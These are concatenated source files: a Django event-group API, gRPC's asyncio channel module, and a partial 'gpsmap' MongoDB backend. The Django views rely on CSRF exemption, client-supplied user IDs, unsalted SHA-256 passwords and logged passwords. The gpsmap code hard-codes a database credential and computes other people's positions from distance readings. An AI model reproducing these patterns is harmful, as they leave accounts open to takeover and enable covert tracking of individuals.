owner = models.ForeignKey(User, related_name='event_owner', on_delete=models.CASCADE)
def __str__(self):
return self.name
class Group(models.Model):
name = models.CharField(max_length=64)
gid = models.CharField(max_length=36, primary_key=True)
members = models.ManyToManyField(User, related_name='group_members')#, through='Membership', through_fields=('group', 'user'))
owner = models.ForeignKey(User, related_name='group_owner', on_delete=models.CASCADE)
GROUP_TYPE_CHOICES = (
('private', 'Private Group'),
('public', 'Public Group')
)
groupType = models.CharField(max_length=7, choices=GROUP_TYPE_CHOICES)
events = models.ManyToManyField(Event, related_name='group_events')
def __str__(self):
return self.name
'''
class Membership(models.Model):
group = models.ForeignKey(Group, related_name='group_membership', on_delete=models.CASCADE)
user = models.ForeignKey(User, related_name='user_membership', on_delete=models.CASCADE)
notify = models.BooleanField()
'''
```
#### File: Pop/backend/views.py
```python
from django.http import JsonResponse, Http404
from django.views.decorators.csrf import csrf_exempt
from exponent_server_sdk import PushClient, PushMessage, DeviceNotRegisteredError
from .models import Group, User, Event
import hashlib, uuid
def getParams(request, tags):
print(request.POST)
return [request.POST[i] for i in tags]
def getHash(name, pwd):
return hashlib.sha256((name+pwd).encode()).digest()
# Create your views here.
@csrf_exempt
def getUid(request):#done, tested
[name] = getParams(request, ['name'])
q = User.objects.filter(pk=name)
if len(q) > 0:
return JsonResponse({'uid': q[0].uid})
else:
raise Http404("you done fked up")
@csrf_exempt
def joinOpenGroup(request):#done, tested
[uid, gid] = getParams(request, ['uid', 'gid'])
g = Group.objects.get(pk=gid)
u = User.objects.get(pk=uid)
if g.groupType == 'public' or g.groupType == 'private':
g.members.add(u)
g.save()
return JsonResponse({'success': 'true'})
else:
raise Http404("Invalid group or invalid user!")
@csrf_exempt
def addEvent(request):#done, tested
[uid, gid, name, desc, loc] = getParams(request, ['uid', 'gid', 'name', 'desc', 'loc'])
newEvent = Event(name=name, eid=str(uuid.uuid4()), desc=desc, loc=loc, owner=User.objects.get(pk=uid))
newEvent.save()
q = Group.objects.get(pk=gid)
q.events.add(newEvent)
q.save()
if q.groupType == 'private' or q.groupType == 'public':
responses = PushClient().publish_multiple([PushMessage(to=u.expoPushToken,
title='{} happening at {}!'.format(name, loc),
body=newEvent.desc,
ttl=3,
priority='high',
sound='default') for u in q.members.all()])
for i in range(len(responses)):
try:
responses[i].validate_response()
except DeviceNotRegisteredError:
u = q.members.all()[i]
u.expoPushToken = ''
u.save()
return JsonResponse({'eid': newEvent.eid})
@csrf_exempt
def deleteEvent(request):#done, BUGGY
[uid, eid] = getParams(request, ['uid', 'eid'])
q = Event.objects.get(pk=eid)
g = q.group_events.all()[0]
if uid == q.owner.uid or uid == g.owner.uid:
g.events.remove(q)
q.delete()
q.save()
return JsonResponse({'success': 'true'})
else:
raise Http404("Restricted access!")
@csrf_exempt
def getGroupList(request):#done, tested
[uid] = getParams(request, ['uid'])
gList = User.objects.get(pk=uid).group_members.all()
return JsonResponse({'groupList': [g.gid for g in gList]})
@csrf_exempt
def getGroupInfo(request):#done, tested
[gid] = getParams(request, ['gid'])
g = Group.objects.get(pk=gid)
return JsonResponse({'gid': gid,'name': g.name, 'type': g.groupType,
'memberList': [u.uid for u in g.members.all()],
'owner': g.owner.uid, 'unconfirmed': 0})
@csrf_exempt
def getEventList(request):#done, should be ok
[gid] = getParams(request, ['gid'])
eList = Group.objects.get(gid=gid).events.all()
return JsonResponse({'eventList': [e.eid for e in eList]})
@csrf_exempt
def getEventInfo(request):#done, tested
[eid, uid] = getParams(request, ['eid', 'uid'])
q = Event.objects.get(pk=eid)
return JsonResponse({'eid': eid, 'name': q.name,'desc': q.desc, 'loc': q.loc,
'status': q.confirmed, 'initTime': q.initTime.strftime('%b-%d %I:%M %p'),
'owner': q.owner.uid, 'isOwner': uid == q.owner.uid or uid == q.group_events.all()[0].owner.uid})
@csrf_exempt
def register(request):#done, tested
[name, pwd] = getParams(request, ['name', 'pwd'])
if len(User.objects.filter(name=name)) > 0:
raise Http404("Try another name!")
newUser = User(name=name, uid=str(uuid.uuid4()), pwdHash=getHash(name, pwd))
newUser.save()
return JsonResponse({'uid': newUser.uid})
@csrf_exempt
def login(request):#done, tested
[name, pwd] = getParams(request, ['name', 'pwd'])
u = User.objects.get(name=name)
if u.pwdHash == getHash(name, pwd):
for otheruser in User.objects.all():
if otheruser.expoPushToken == u.expoPushToken:
otheruser.expoPushToken = ''
return JsonResponse({'uid': u.uid})
else:
raise Http404("Restricted access!")
@csrf_exempt
def createGroup(request):#done, tested
[uid, name, gtype] = getParams(request, ['uid', 'name', 'type'])
newGroup = Group(name=name, gid=str(uuid.uuid4()), owner=User.objects.get(uid=uid), groupType=gtype)
newGroup.save()
newGroup.members.add(User.objects.get(uid=uid))
newGroup.save()
return JsonResponse({'gid': newGroup.gid})
@csrf_exempt
def removeMember(request):#done, tested
[m_uid, uid, gid] = getParams(request, ['m_uid', 'uid', 'gid'])
if m_uid == Group.objects.get(pk=gid).owner.uid or m_uid == uid:
q = Group.objects.get(pk=gid)
q.members.remove(User.objects.get(pk=uid))
q.save()
return JsonResponse({'status': 'success'})
else:
raise Http404("Restricted access!")
@csrf_exempt
def addMember(request):#done, tested
[m_uid, uid, gid] = getParams(request, ['m_uid', 'uid', 'gid'])
if m_uid == Group.objects.get(pk=gid).owner.uid:
q = Group.objects.get(pk=gid)
q.members.add(User.objects.get(pk=uid))
q.save()
return JsonResponse({'status': 'success'})
else:
raise Http404("Restricted access!")
@csrf_exempt
def deleteGroup(request):#done, BUGGY
[gid, uid] = getParams(request, ['gid', 'uid'])
q = Group.objects.get(pk=gid)
if uid == q.owner.uid:
q.delete()
return JsonResponse({'status': 'success'})
else:
raise Http404("Restricted access!")
@csrf_exempt
def getUserInfo(request):#done, tested
[uid] = getParams(request, ['uid'])
name = User.objects.get(pk=uid).name
return JsonResponse({'name': name})
@csrf_exempt
def confirmEvent(request):#done, tested
[uid, eid] = getParams(request, ['uid', 'eid'])
e = Event.objects.get(pk=eid)
if len(e.confirmedMembers.filter(pk=uid)) == 0:
e.confirmed += 1
e.confirmedMembers.add(User.objects.get(pk=uid))
e.save()
if e.confirmed == 1:
g = e.group_events.all()[0]
if g.groupType == 'public':
responses = PushClient().publish_multiple([PushMessage(to=u.expoPushToken,
title="You'll never believe what you're missing out on!",
body="This is a test notification",
ttl=30,
priority='high',
sound='default') for u in g.members.all()])
for i in range(len(responses)):
try:
responses[i].validate_response()
except DeviceNotRegisteredError:
u = g.members.all()[i]
u.expoPushToken = ''
u.save()
return JsonResponse({'status': 'success'})
else:
raise Http404("Multiple confirmation")
@csrf_exempt
def search(request):#done, tested
[query] = getParams(request, ['q'])
return JsonResponse({'list': [g.gid for g in Group.objects.all()
if query in g.name and g.groupType == 'public']})
@csrf_exempt
def updateToken(request):
[token, uid] = getParams(request, ['token', 'uid'])
u = User.objects.get(uid=uid)
print("before: "+u.expoPushToken)
u.expoPushToken = token
u.save()
print("after: "+u.expoPushToken)
return JsonResponse({'status': 'success'})
``` |
{
"source": "JohnZhaoXiaoHu/grpc",
"score": 2
} |
#### File: experimental/aio/_channel.py
```python
import asyncio
from typing import Any, AsyncIterable, Optional, Sequence, AbstractSet, Text
from weakref import WeakSet
import logging
import grpc
from grpc import _common
from grpc._cython import cygrpc
from . import _base_call
from ._call import (StreamStreamCall, StreamUnaryCall, UnaryStreamCall,
UnaryUnaryCall)
from ._interceptor import (InterceptedUnaryUnaryCall,
UnaryUnaryClientInterceptor)
from ._typing import (ChannelArgumentType, DeserializingFunction, MetadataType,
SerializingFunction)
from ._utils import _timeout_to_deadline
_IMMUTABLE_EMPTY_TUPLE = tuple()
_LOGGER = logging.getLogger(__name__)
class _OngoingCalls:
"""Internal class used for have visibility of the ongoing calls."""
_calls: AbstractSet[_base_call.RpcContext]
def __init__(self):
self._calls = WeakSet()
def _remove_call(self, call: _base_call.RpcContext):
try:
self._calls.remove(call)
except KeyError:
pass
@property
def calls(self) -> AbstractSet[_base_call.RpcContext]:
"""Returns the set of ongoing calls."""
return self._calls
def size(self) -> int:
"""Returns the number of ongoing calls."""
return len(self._calls)
def trace_call(self, call: _base_call.RpcContext):
"""Adds and manages a new ongoing call."""
self._calls.add(call)
call.add_done_callback(self._remove_call)
class _BaseMultiCallable:
"""Base class of all multi callable objects.
Handles the initialization logic and stores common attributes.
"""
_loop: asyncio.AbstractEventLoop
_channel: cygrpc.AioChannel
_ongoing_calls: _OngoingCalls
_method: bytes
_request_serializer: SerializingFunction
_response_deserializer: DeserializingFunction
_channel: cygrpc.AioChannel
_method: bytes
_request_serializer: SerializingFunction
_response_deserializer: DeserializingFunction
_interceptors: Optional[Sequence[UnaryUnaryClientInterceptor]]
_loop: asyncio.AbstractEventLoop
# pylint: disable=too-many-arguments
def __init__(
self,
channel: cygrpc.AioChannel,
ongoing_calls: _OngoingCalls,
method: bytes,
request_serializer: SerializingFunction,
response_deserializer: DeserializingFunction,
interceptors: Optional[Sequence[UnaryUnaryClientInterceptor]],
loop: asyncio.AbstractEventLoop,
) -> None:
self._loop = loop
self._channel = channel
self._ongoing_calls = ongoing_calls
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._interceptors = interceptors
class UnaryUnaryMultiCallable(_BaseMultiCallable):
"""Factory an asynchronous unary-unary RPC stub call from client-side."""
def __call__(self,
request: Any,
*,
timeout: Optional[float] = None,
metadata: Optional[MetadataType] = None,
credentials: Optional[grpc.CallCredentials] = None,
wait_for_ready: Optional[bool] = None,
compression: Optional[grpc.Compression] = None
) -> _base_call.UnaryUnaryCall:
"""Asynchronously invokes the underlying RPC.
Args:
request: The request value for the RPC.
timeout: An optional duration of time in seconds to allow
for the RPC.
metadata: Optional :term:`metadata` to be transmitted to the
service-side of the RPC.
credentials: An optional CallCredentials for the RPC. Only valid for
secure Channel.
wait_for_ready: This is an EXPERIMENTAL argument. An optional
flag to enable wait for ready mechanism
compression: An element of grpc.compression, e.g.
grpc.compression.Gzip. This is an EXPERIMENTAL option.
Returns:
A Call object instance which is an awaitable object.
Raises:
RpcError: Indicating that the RPC terminated with non-OK status. The
raised RpcError will also be a Call for the RPC affording the RPC's
metadata, status code, and details.
"""
if compression:
raise NotImplementedError("TODO: compression not implemented yet")
if metadata is None:
metadata = _IMMUTABLE_EMPTY_TUPLE
if not self._interceptors:
call = UnaryUnaryCall(request, _timeout_to_deadline(timeout),
metadata, credentials, wait_for_ready,
self._channel, self._method,
self._request_serializer,
self._response_deserializer, self._loop)
else:
call = InterceptedUnaryUnaryCall(
self._interceptors, request, timeout, metadata, credentials,
wait_for_ready, self._channel, self._method,
self._request_serializer, self._response_deserializer,
self._loop)
self._ongoing_calls.trace_call(call)
return call
class UnaryStreamMultiCallable(_BaseMultiCallable):
"""Affords invoking a unary-stream RPC from client-side in an asynchronous way."""
def __call__(self,
request: Any,
*,
timeout: Optional[float] = None,
metadata: Optional[MetadataType] = None,
credentials: Optional[grpc.CallCredentials] = None,
wait_for_ready: Optional[bool] = None,
compression: Optional[grpc.Compression] = None
) -> _base_call.UnaryStreamCall:
"""Asynchronously invokes the underlying RPC.
Args:
request: The request value for the RPC.
timeout: An optional duration of time in seconds to allow
for the RPC.
metadata: Optional :term:`metadata` to be transmitted to the
service-side of the RPC.
credentials: An optional CallCredentials for the RPC. Only valid for
secure Channel.
wait_for_ready: This is an EXPERIMENTAL argument. An optional
flag to enable wait for ready mechanism
compression: An element of grpc.compression, e.g.
grpc.compression.Gzip. This is an EXPERIMENTAL option.
Returns:
A Call object instance which is an awaitable object.
"""
if compression:
raise NotImplementedError("TODO: compression not implemented yet")
deadline = _timeout_to_deadline(timeout)
if metadata is None:
metadata = _IMMUTABLE_EMPTY_TUPLE
call = UnaryStreamCall(request, deadline, metadata, credentials,
wait_for_ready, self._channel, self._method,
self._request_serializer,
self._response_deserializer, self._loop)
self._ongoing_calls.trace_call(call)
return call
class StreamUnaryMultiCallable(_BaseMultiCallable):
"""Affords invoking a stream-unary RPC from client-side in an asynchronous way."""
def __call__(self,
request_async_iterator: Optional[AsyncIterable[Any]] = None,
timeout: Optional[float] = None,
metadata: Optional[MetadataType] = None,
credentials: Optional[grpc.CallCredentials] = None,
wait_for_ready: Optional[bool] = None,
compression: Optional[grpc.Compression] = None
) -> _base_call.StreamUnaryCall:
"""Asynchronously invokes the underlying RPC.
Args:
request: The request value for the RPC.
timeout: An optional duration of time in seconds to allow
for the RPC.
metadata: Optional :term:`metadata` to be transmitted to the
service-side of the RPC.
credentials: An optional CallCredentials for the RPC. Only valid for
secure Channel.
wait_for_ready: This is an EXPERIMENTAL argument. An optional
flag to enable wait for ready mechanism
compression: An element of grpc.compression, e.g.
grpc.compression.Gzip. This is an EXPERIMENTAL option.
Returns:
A Call object instance which is an awaitable object.
Raises:
RpcError: Indicating that the RPC terminated with non-OK status. The
raised RpcError will also be a Call for the RPC affording the RPC's
metadata, status code, and details.
"""
if compression:
raise NotImplementedError("TODO: compression not implemented yet")
deadline = _timeout_to_deadline(timeout)
if metadata is None:
metadata = _IMMUTABLE_EMPTY_TUPLE
call = StreamUnaryCall(request_async_iterator, deadline, metadata,
credentials, wait_for_ready, self._channel,
self._method, self._request_serializer,
self._response_deserializer, self._loop)
self._ongoing_calls.trace_call(call)
return call
class StreamStreamMultiCallable(_BaseMultiCallable):
"""Affords invoking a stream-stream RPC from client-side in an asynchronous way."""
def __call__(self,
request_async_iterator: Optional[AsyncIterable[Any]] = None,
timeout: Optional[float] = None,
metadata: Optional[MetadataType] = None,
credentials: Optional[grpc.CallCredentials] = None,
wait_for_ready: Optional[bool] = None,
compression: Optional[grpc.Compression] = None
) -> _base_call.StreamStreamCall:
"""Asynchronously invokes the underlying RPC.
Args:
request: The request value for the RPC.
timeout: An optional duration of time in seconds to allow
for the RPC.
metadata: Optional :term:`metadata` to be transmitted to the
service-side of the RPC.
credentials: An optional CallCredentials for the RPC. Only valid for
secure Channel.
wait_for_ready: This is an EXPERIMENTAL argument. An optional
flag to enable wait for ready mechanism
compression: An element of grpc.compression, e.g.
grpc.compression.Gzip. This is an EXPERIMENTAL option.
Returns:
A Call object instance which is an awaitable object.
Raises:
RpcError: Indicating that the RPC terminated with non-OK status. The
raised RpcError will also be a Call for the RPC affording the RPC's
metadata, status code, and details.
"""
if compression:
raise NotImplementedError("TODO: compression not implemented yet")
deadline = _timeout_to_deadline(timeout)
if metadata is None:
metadata = _IMMUTABLE_EMPTY_TUPLE
call = StreamStreamCall(request_async_iterator, deadline, metadata,
credentials, wait_for_ready, self._channel,
self._method, self._request_serializer,
self._response_deserializer, self._loop)
self._ongoing_calls.trace_call(call)
return call
class Channel:
"""Asynchronous Channel implementation.
A cygrpc.AioChannel-backed implementation.
"""
_loop: asyncio.AbstractEventLoop
_channel: cygrpc.AioChannel
_unary_unary_interceptors: Optional[Sequence[UnaryUnaryClientInterceptor]]
_ongoing_calls: _OngoingCalls
def __init__(self, target: Text, options: Optional[ChannelArgumentType],
credentials: Optional[grpc.ChannelCredentials],
compression: Optional[grpc.Compression],
interceptors: Optional[Sequence[UnaryUnaryClientInterceptor]]):
"""Constructor.
Args:
target: The target to which to connect.
options: Configuration options for the channel.
credentials: A cygrpc.ChannelCredentials or None.
compression: An optional value indicating the compression method to be
used over the lifetime of the channel.
interceptors: An optional list of interceptors that would be used for
intercepting any RPC executed with that channel.
"""
if compression:
raise NotImplementedError("TODO: compression not implemented yet")
if interceptors is None:
self._unary_unary_interceptors = None
else:
self._unary_unary_interceptors = list(
filter(
lambda interceptor: isinstance(interceptor,
UnaryUnaryClientInterceptor),
interceptors))
invalid_interceptors = set(interceptors) - set(
self._unary_unary_interceptors)
if invalid_interceptors:
raise ValueError(
"Interceptor must be "+\
"UnaryUnaryClientInterceptors, the following are invalid: {}"\
.format(invalid_interceptors))
self._loop = asyncio.get_event_loop()
self._channel = cygrpc.AioChannel(_common.encode(target), options,
credentials, self._loop)
self._ongoing_calls = _OngoingCalls()
async def __aenter__(self):
"""Starts an asynchronous context manager.
Returns:
Channel the channel that was instantiated.
"""
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
"""Finishes the asynchronous context manager by closing the channel.
Still active RPCs will be cancelled.
"""
await self._close(None)
async def _close(self, grace):
if self._channel.closed():
return
# No new calls will be accepted by the Cython channel.
self._channel.closing()
if grace:
# pylint: disable=unused-variable
_, pending = await asyncio.wait(self._ongoing_calls.calls,
timeout=grace,
loop=self._loop)
if not pending:
return
# A new set is created acting as a shallow copy because
# when cancellation happens the calls are automatically
# removed from the originally set.
calls = WeakSet(data=self._ongoing_calls.calls)
for call in calls:
call.cancel()
self._channel.close()
async def close(self, grace: Optional[float] = None):
"""Closes this Channel and releases all resources held by it.
This method immediately stops the channel from executing new RPCs in
all cases.
If a grace period is specified, this method wait until all active
RPCs are finshed, once the grace period is reached the ones that haven't
been terminated are cancelled. If a grace period is not specified
(by passing None for grace), all existing RPCs are cancelled immediately.
This method is idempotent.
"""
await self._close(grace)
def get_state(self,
try_to_connect: bool = False) -> grpc.ChannelConnectivity:
"""Check the connectivity state of a channel.
This is an EXPERIMENTAL API.
If the channel reaches a stable connectivity state, it is guaranteed
that the return value of this function will eventually converge to that
state.
Args: try_to_connect: a bool indicate whether the Channel should try to
connect to peer or not.
Returns: A ChannelConnectivity object.
"""
result = self._channel.check_connectivity_state(try_to_connect)
return _common.CYGRPC_CONNECTIVITY_STATE_TO_CHANNEL_CONNECTIVITY[result]
async def wait_for_state_change(
self,
last_observed_state: grpc.ChannelConnectivity,
) -> None:
"""Wait for a change in connectivity state.
This is an EXPERIMENTAL API.
The function blocks until there is a change in the channel connectivity
state from the "last_observed_state". If the state is already
different, this function will return immediately.
There is an inherent race between the invocation of
"Channel.wait_for_state_change" and "Channel.get_state". The state can
change arbitrary times during the race, so there is no way to observe
every state transition.
If there is a need to put a timeout for this function, please refer to
"asyncio.wait_for".
Args:
last_observed_state: A grpc.ChannelConnectivity object representing
the last known state.
"""
assert await self._channel.watch_connectivity_state(
last_observed_state.value[0], None)
def unary_unary(
self,
method: Text,
request_serializer: Optional[SerializingFunction] = None,
response_deserializer: Optional[DeserializingFunction] = None
) -> UnaryUnaryMultiCallable:
"""Creates a UnaryUnaryMultiCallable for a unary-unary method.
Args:
method: The name of the RPC method.
request_serializer: Optional behaviour for serializing the request
message. Request goes unserialized in case None is passed.
response_deserializer: Optional behaviour for deserializing the
response message. Response goes undeserialized in case None
is passed.
Returns:
A UnaryUnaryMultiCallable value for the named unary-unary method.
"""
return UnaryUnaryMultiCallable(self._channel, self._ongoing_calls,
_common.encode(method),
request_serializer,
response_deserializer,
self._unary_unary_interceptors,
self._loop)
def unary_stream(
self,
method: Text,
request_serializer: Optional[SerializingFunction] = None,
response_deserializer: Optional[DeserializingFunction] = None
) -> UnaryStreamMultiCallable:
return UnaryStreamMultiCallable(self._channel, self._ongoing_calls,
_common.encode(method),
request_serializer,
response_deserializer, None, self._loop)
def stream_unary(
self,
method: Text,
request_serializer: Optional[SerializingFunction] = None,
response_deserializer: Optional[DeserializingFunction] = None
) -> StreamUnaryMultiCallable:
return StreamUnaryMultiCallable(self._channel, self._ongoing_calls,
_common.encode(method),
request_serializer,
response_deserializer, None, self._loop)
def stream_stream(
self,
method: Text,
request_serializer: Optional[SerializingFunction] = None,
response_deserializer: Optional[DeserializingFunction] = None
) -> StreamStreamMultiCallable:
return StreamStreamMultiCallable(self._channel, self._ongoing_calls,
_common.encode(method),
request_serializer,
response_deserializer, None,
self._loop)
``` |
{
"source": "johnzhd/gpsmap",
"score": 2
} |
#### File: gpsmap/gpsmap/backend.py
```python
import pymongo
import datetime
import json
import Queue
import threading
import time
import calc_postion
from pprint import pprint
import md5
from baselib import error_print
global_db_name = "gpsmap"
global_db_url = "mongodb://gpsmap:[email protected]:27017/"+global_db_name
global_db_origin_collection = "origin"
global_db_calc_collection = "calc"
global_db_user_collection = "userextern"
global_db_device_collection = "device"
global_key_la = "latitude"
global_key_lo = "longitude"
global_key_list = "items"
global_key_sendtime = "sendtime"
global_key_uid = "id"
global_key_dis = "distance"
global_key_name = "name"
global_key_img = "img"
global_key_gender = "gender"
global_key_device = "device"
global_default_base_time = datetime.datetime(1970,1,1,0,0,0,0)
global_default_uint_time = 60 * 10
global_care_keys = [global_key_la, global_key_lo, global_key_list, global_key_sendtime]
global_origin_keys = [global_key_uid, global_key_la, global_key_lo, global_key_sendtime, global_key_dis]
'''
origin:
_id: obj()
loc:
type: "Point"
coordinates: []
distance: "300"
sendtime: "2016-01-01 01:01:01"
time: "2016-01-01 01:01:01"
id : "string"
calc:
_id: obj()
id: "string"
time: "2016-01-01 01:01:01"
loc:
type: "Point"
coordinates: []
distance: "300"
level: 0 unused
1 High
...
5 Low
'''
def md5String(s):
try:
s = s.encode(encoding="utf-8")
return md5.new(s).hexdigest()
except Exception as e:
error_print(e)
return None
def CreateUID(obj):
'''
change to use name md5
'''
## global_key_uid
## global_key_img
md5key_list = [global_key_name]
try:
m = md5.new()
ret = ""
for key in md5key_list:
if key not in obj:
return obj[global_key_uid]
value = obj[key].encode(encoding="utf-8")
m.update(value)
ret += "{0:04d}".format(len(value))
ret_m = m.hexdigest()
if not ret_m:
return obj[global_key_uid]
return ret + ret_m
except Exception as e:
error_print(e)
return None
"""
origin :
{
"id", "time", "sendtime", "distance",
"loc": { type: "Point", coordinates: [ 40, 5 ] }
}
{
"id" : 1
"time" : -1
"loc" : "2dsphere"
}
userextern
{
"id": 1
"time": -1
}
calc
{
"id": 1
"loc": "2dsphere"
"distance":
"time": -1
}
device
{
"device": 1
"loc" : "2dsphere"
"time": -1
}
"""
global_timedelta = datetime.timedelta(minutes=5)
global_calc_timedelta = datetime.timedelta(minutes=1)
global_EP = 50
global_timeformat_string = "%Y-%m-%d %H:%M:%S"
global_timeformat_string_minutes = "%Y-%m-%d %H:%M"
def time_format(date):
return date.strftime(global_timeformat_string)
def string_to_time(s):
try:
return datetime.datetime.strptime(s, global_timeformat_string)
except Exception as e:
return None
def string_standard(s):
try:
return time_format(string_to_time(s))
except Exception as e:
return None
def time_now():
return time_format( datetime.datetime.now() )
def string_time_to_unit(start, check, tunit):
try:
c = string_to_time(check)
d = c - start
ret = d.total_seconds() / tunit
return int(ret)
except Exception as e:
return None
def string_min_whole(s, start, tunit):
de = datetime.timedelta(seconds = s * tunit)
return time_format(start + de)
def fretch_gps_from_data(data):
try:
return data["loc"]["coordinates"][1], data["loc"]["coordinates"][0], int(data["distance"])
except Exception as e:
return None, None, None
class opt():
def __init__(self):
self.connect = pymongo.MongoClient(global_db_url)
self.queue = Queue.Queue()
self.mutex = threading.Lock()
self.thread = None
def Start_Calc_Thread(self):
if self.mutex.acquire():
if not self.thread or not self.thread.is_alive():
self.thread = None
self.thread = threading.Thread(target=self.ThreadCore)
self.thread.start()
self.mutex.release()
def ThreadCore(self):
print("In Core.")
while not self.queue.empty():
try:
ids = self.queue.get(False)
print("Check ids {0}.".format(len(ids)))
n = self.calc_list_id(ids)
print("Update ids {0}.".format(n))
n = self.UpdateUser(ids)
print("Update users {0}.".format(n))
except Exception as e:
break
print("Quit Core.")
def producer(self, data):
# self.queue.put(data)
# return true
obj = self.produce_obj(data)
if not obj:
return None
if global_key_la not in obj or global_key_lo not in obj or global_key_list not in obj:
return None
return self.producer_action(obj)
def producer_action(self, obj):
try:
count = self.produce_bulk(obj, global_db_origin_collection, global_db_user_collection )
return count
except Exception as e:
error_print(e)
print(obj)
pass
return None
def produce_obj(self, data):
try:
obj = json.loads(data)
return obj
except Exception as e:
error_print(e)
return None
def produce_bulk(self, obj, opoints, users):
if not obj:
return None
db = self.connect.get_database(global_db_name)
o_coll = db.get_collection(opoints)
u_coll = db.get_collection(users)
o_bulk = o_coll.initialize_unordered_bulk_op()
u_bulk = u_coll.initialize_unordered_bulk_op()
ids = set()
for origin in self.parser_obj(obj):
data = self.produce_insert_origin(origin)
if not data:
continue
o_bulk.insert( data )
ids.add(data[global_key_uid])
f, d = self.produce_update_user(origin)
if not f or not d:
continue
u_bulk.find(f).upsert().update(d)
self.start_calc_ids(list(ids))
result = o_bulk.execute()
count = result['nInserted']
result = u_bulk.execute()
# count = result['nUpserted'] + result['nModified']
return count > 0
def produce_insert_origin(self, origin):
try:
for n in global_origin_keys:
if n not in origin:
return None
data = {}
data[global_key_uid] = str(origin[global_key_uid])
data[global_key_dis] = str(origin[global_key_dis])
data[global_key_sendtime] = str(origin[global_key_sendtime])
data["loc"] = { "type": "Point", "coordinates": [ float(origin[global_key_lo]), float(origin[global_key_la]) ] }
data["time"] = time_now()
return data
except Exception as e:
pass
return None
def produce_update_user(self, origin):
try:
data = origin.copy()
for key in global_origin_keys[1:]:
if key in data:
del data[key]
data["time"] = time_now()
f = {global_key_uid: data[global_key_uid]}
d = {}
if "device" in data:
d["$addToSet"] = {"device": data["device"]}
del data["device"]
d["$set"] = data
d["$inc"] = {"ocount": 1}
return f, d
except Exception as e:
pass
return None, None
def standardize_data(self, origin):
if "sex" in origin:
value = int(origin["sex"])
del origin["sex"]
try:
if value == 1:
origin[global_key_gender] = "male"
elif value == 2:
origin[global_key_gender] = "female"
else:
origin[global_key_gender] = "none"
except Exception as e:
origin[global_key_gender] = "none"
return origin
def parser_obj(self, obj):
for key in global_care_keys:
if key not in obj:
return
if not obj[global_key_list]:
return
unique = {}
unique[global_key_sendtime] = obj[global_key_sendtime]
unique[global_key_la] = obj[global_key_la]
unique[global_key_lo] = obj[global_key_lo]
if global_key_device in obj:
unique[global_key_device] = obj[global_key_device]
for one in obj[global_key_list]:
if global_key_dis not in one:
continue
uid = CreateUID(one)
if not uid:
continue
ret = unique.copy()
ret.update(one)
ret[global_key_uid] = uid
yield self.standardize_data(ret)
def get_origin_points_data_from_db(self, i, start, end):
f = {"id": i}
c = {"_id": 0, "loc.coordinates":1, "time":1, "distance":1}
ret = []
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_calc_collection)
if start:
f["time"] = {}
f["time"]["$gte"] = start
if end:
if "time" not in f:
f["time"] = {}
f["time"]["$lte"] = end
origin_collection = db.get_collection(global_db_origin_collection)
r = origin_collection.find(f, c).sort("time", pymongo.ASCENDING)
for d in r:
ret.append(d)
return ret
except Exception as e:
error_print(e)
return ret
def cut_list_by_time(self, data, tunit):
origin_list = {}
base_time = global_default_base_time
sorted(data, key=lambda x: x["time"])
for d in data:
if not d:
continue
try:
minutes = string_time_to_unit(base_time, d["time"], tunit)
if minutes is None:
continue
if minutes not in origin_list:
origin_list[minutes] = []
origin_list[minutes].append(d)
except Exception as e:
continue
return origin_list, base_time
def check_and_calc_with_data(self, data, tunit, id):
try:
tunit = int(tunit)
except Exception as e:
tunit = global_default_uint_time
dic_data, base_time = self.cut_list_by_time(data, tunit)
if not dic_data:
return None
new_ret = {}
for minutes in dic_data:
key = string_min_whole(minutes + 1, base_time, tunit)
r = self.zone_and_calc(dic_data[minutes], id, key)
new_ret[key] = r
return new_ret
def translate_calc_to_ui(self, new_ret, i):
ret = []
for key in new_ret:
if not new_ret[key]:
continue
d = new_ret[key]
ret.append({global_key_uid: i,
"time": d["time"],
"latitude": d["loc"]["coordinates"][1],
"longitude": d["loc"]["coordinates"][0],
"distance": d["distance"]
})
return ret
def check_and_calc(self, i, start, end, tunit):
data = self.get_origin_points_data_from_db(i, start, end)
if not data:
return None
ret = self.check_and_calc_with_data(data, tunit, i)
if not ret:
return None
return self.translate_calc_to_ui(ret, i)
def zone_and_calc(self, l, i, tm):
if len(l) < 3:
return None
r = calc_postion.calc_list(l, global_EP, fretch_gps_from_data)
if r:
ret = {}
ret[global_key_uid] = i
ret["loc"] = {"type": "Point", "coordinates" : [r[1], r[0]]}
ret["distance"] = r[2]
ret["time"] = tm
ret["level"] = r[3]
return ret
return None
def start_calc_ids(self, ids):
# push in Queue
# in no threading
# start threading
if not ids:
return
self.queue.put(ids)
self.Start_Calc_Thread()
def calc_list_id(self, ids):
tunit = global_default_uint_time
db = self.connect.get_database(global_db_name)
u_coll = db.get_collection(global_db_calc_collection)
u_bulk = u_coll.initialize_unordered_bulk_op()
count = 0
for i in ids:
if not i:
continue
ret = self.calc_one_id(i, u_coll, u_bulk, tunit)
if ret:
count += ret
if count > 0:
try:
result = u_bulk.execute()
count = result['nUpserted'] + result['nModified']
return count
except Exception as e:
error_print(e)
return None
def calc_one_id(self, i, u_coll, u_bulk, tunit):
last_time = None
try:
it = u_coll.find({global_key_uid: i}, {"_id":0, "time": 1}).sort("time", pymongo.DESCENDING).limit(1)
for one in it:
last_time = one["time"]
except Exception as e:
return None
data = self.get_origin_points_data_from_db(i, last_time, None)
if not data or len(data) < 3:
return None
ret = self.check_and_calc_with_data(data, tunit, i)
try:
max = len(ret)
count = 0
for key in ret:
count += 1
d = ret[key]
f = {global_key_uid: i, "level": 0, "time": key}
if not d:
if count >= max: ## In the last time zone, We won't insert None to db
count -= 1
break
d = f
u_bulk.find(f).upsert().update_one({"$set": d})
d = None
f = None
return count
except Exception as e:
error_print(e)
return None
def UpdateUser(self, ids):
db = self.connect.get_database(global_db_name)
uniset = {}
try:
t_coll = db.get_collection(global_db_origin_collection)
for i in ids:
if i not in uniset:
uniset[i] = {}
else:
continue
f = {"id": i}
n = t_coll.find(f).count()
uniset[i]["ocount"] = n
t_coll = db.get_collection(global_db_calc_collection)
for key in uniset:
f = {"id": key}
n = t_coll.find(f).count()
uniset[key]["pcount"] = n
t_coll = db.get_collection(global_db_user_collection)
u_bulk = t_coll.initialize_unordered_bulk_op()
for key in uniset:
u_bulk.find({"id": key}).update({"$set": uniset[key]})
result = u_bulk.execute()
count = result['nModified']
return count
except Exception as e:
error_print(e)
return None
def NearPoint(self, lat, lng, count):
if not count:
count = 20
